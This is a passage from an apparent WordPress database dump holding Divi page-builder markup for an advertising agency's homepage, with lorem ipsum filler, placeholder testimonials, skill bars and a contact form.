_builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 21:02:39','2020-07-06 21:02:39','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(263,1,'2020-07-06 21:04:19','2020-07-06 21:04:19','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" 